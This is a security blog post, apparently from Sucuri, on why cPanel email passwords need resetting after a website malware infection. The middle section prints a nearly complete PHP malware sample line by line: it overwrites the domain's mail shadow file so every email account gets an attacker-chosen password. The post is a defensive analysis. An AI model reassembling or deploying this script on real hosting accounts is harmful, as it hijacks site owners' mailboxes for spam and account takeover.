Reset Email Account Passwords After a Website Malware Infection

It’s not uncommon for bad actors to use compromised websites to send large amounts of spam email. This can cause major headaches for website owners — spam can lead to the blacklisting of a web host’s mail server IPs, or the domain name itself may be placed on blacklists like Spamhaus DBL.

Blacklisting is problematic. It has serious consequences for a website’s reputation, may impact sales and revenue, and it can be a tedious process to remove a domain from a blacklist authority.

Website owners whose sites have been blacklisted will experience problems when sending emails to recipients. In the best case scenario after a compromise, your web host will detect the outgoing spam email and suspend your website until you (or they) can resolve the issue. There can be a myriad of negative impacts on your website resulting in downtime— from SEO and lost organic traffic, to opportunity costs like missed sales.

Even if your host doesn’t suspend your website, you may not be in the clear. We have seen incidents where only dedicated mail server IPs had been blacklisted and the hosted website stayed online, but the impact was still significant. Affected websites were unable to send promotional email campaigns for their ecommerce store and customers were unable to receive order updates, account activation information, and other important transactional content.

Most users will log into their hosting cPanel and navigate to the email accounts page in order to manage their email account passwords
Most users will log into their hosting cPanel and navigate to the email accounts page in order to manage their email account passwords.

The Top Two Outgoing Spam Email Security Incidents

To help showcase the potential damage caused by losing control of your domain’s email account(s) we should start by asking ourselves; how can someone lose control of their email?

While there are a few different ways, let’s focus on the two most prevalent methods:

  • A website compromise
  • An email account compromise

Compromised Websites

In this first scenario, a malicious user has been able to execute code or upload files to a website, which are then used to send out the spam email. Spam email is usually sent through a PHP script and often doesn’t involve any SMTP authentication to a specific email address.

Spammers can send mail directly from the cPanel username by default since it spawns and owns the PHP process generated by the PHP mailer script.  Often times, however, a spammer will spoof the headers within the PHP mailer script to make it appear as if sent from a different address.

The email protocol SMTP does not have address authentication mechanisms, so forged sender addresses are allowed. These forged emails are used to trick recipients to believe the From: address shown in their email client is the sender. e.g The From: address shows service@paypal.com, but the actual sending address is contact@compromisedwebsite.com.

The result is that some website owners may overlook resetting their hosted email accounts (and other hosting logins like SSH, FTP, MySQL, etc) since no spam was sent through them.

Compromised Email Accounts

A website owner may also experience the second scenario—a compromised email account that they host themselves. In this case, site owners are often informed that their email account’s password was weak or that the malware on their local devices (i.e smart phone, laptop, etc) stole their login credentials. This leads the owner to believe they only need to run some antivirus/anti-malware on their local devices, reset and strengthen their passwords, and they will be good to go.

Both of these incidents overlook a very important fact. Malicious users can change passwords on their own once they have compromised a website hosted on a server using cPanel. They don’t even need to have direct access to the actual cPanel used for managing the website and its email accounts.

In the first scenario for compromised websites, email accounts could have also been compromised (even if spam wasn’t sent through them) – which is why it’s vital that these passwords be reset.

In the second scenario for one or more compromised email accounts, if the owner doesn’t check their hosting account for malware, it doesn’t matter how strong they set their password or how many times they scan their local devices. The malicious user will continue to be able to change the passwords at their leisure until the hosting account is clean of malware.

Analysis of Malware Used to Modify Email Account Passwords

Let’s take a look and break down the specific malware used to change the email account passwords:

<?php
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
$ports=array(25, 587, 465, 110, 995, 143 , 993);
$primary_port='25';

This is the beginning of the PHP malware file. It attempts to set common PHP settings like max_execution_time, which defines how long the PHP coding has to run before the parser terminates it. It then defines the variable $ports with an array of the most common email related ports. The most important port is 25 — it is the standard default port for SMTP and subsequently given its own assigned variable, $primary_port, in the malicious file’s code.

$user=get_current_user();
$password='newemailpassword';

The variable $user is then created with the username obtained from the PHP function get_current_user(), which just outputs the username used to run the PHP file. The new password is defined within the $password variable.

Stored Password Hashes & User Authentication

Before going further into the file’s coding, I want to mention how cPanel stores the email account login details. It’s similar to how /etc/passwd and /etc/shadow files work on most Linux and Unix operating systems, but it does this within the individual cPanel user home directory.

In most cases, cPanel is located in /home*/username/etc/domain.com/ where you will find both the shadow and passwd files. We only need to worry about the shadow file — it contains the password encryption method and password hash used for authentication when logging into the associated email account.

This information also hints to where this malicious file is going with its method:

$pwd = crypt($password,'$1$fakesalt$');
$t = $_SERVER['SERVER_NAME'];
$t = @str_replace("www.","",$t);
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
$ex=explode("rn",$passwd);
@link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.bak');
@unlink('/home/'.$user.'/etc/'.$t.'/shadow');

A new password hash is created using the crypt PHP function, with the MD5 encryption being specified by the $1$ text which is followed by the password’s salt. In this case, however, a legitimate strong salt is not important to the hacker. They can put any random text in the salt section between the $ $ boundaries.

The newly created encrypted password hash is then formed in accordance with the shadow file standards, and looks similar to this:

$1$fakesalt$Dwz7OXQa4A5bj60SBUbqS0

This hash is what the attacker uses to inject into the shadow file in order to change the email account password — but first, they need to read the existing shadow file using file_get_contents and explode to create an array for each line of the shadow file (each line is for a single email account).

Our malicious user is also “nice” enough to demonstrate that they understand the importance of website backups. They create a backup of the original shadow file under the file name shadow.bak using the link function of PHP, then they delete the original shadow file via unlink.

foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."rn");fclose($b);
echo '<span style='color:#00ff00;'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'</span><br>';  "</center>";
}}

The file creates an if statement based on the email account usernames detected by using explode. For each of these lines, it then uses fopen and fwrite to open the file the new shadow file and append the defined data — which, in this case, is a properly formatted shadow file line containing the $pwd variable that stores the new password we created earlier using crypt, along with the email account’s username.

After the if statement finishes writing the data to the shadow file, the email account passwords for that domain will be successfully changed. They can now be used by the attacker to send out spam emails after authenticating with the mail server.

Conclusion

The email account file user/etc/domain.tld/shadow found in cPanel’s user home directory is difficult to harden because it’s writable by the user for email account management.

If you lock down the user/etc/domain.tld/shadow file through the chattr command, you won’t be able to change your email account passwords which can lead to other issues including the inability to delete accounts, or trouble with deleting the entire cPanel user, etc.

As a general rule of thumb, the best course of action is to reset all of the passwords associated with your hosting environment after a website compromise. This includes email accounts for that domain, FTP, SFTP, cPanel, Plesk, WP-admin, MySQL, or any other related access controls.

If you believe your website has been compromised and is serving unwanted spam or other malicious content, we’re always happy to help if you need a hand cleaning it up.


*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Luke Leal. Read the original post at: https://blog.sucuri.net/2019/04/reset-email-account-passwords-after-a-website-malware-infection.html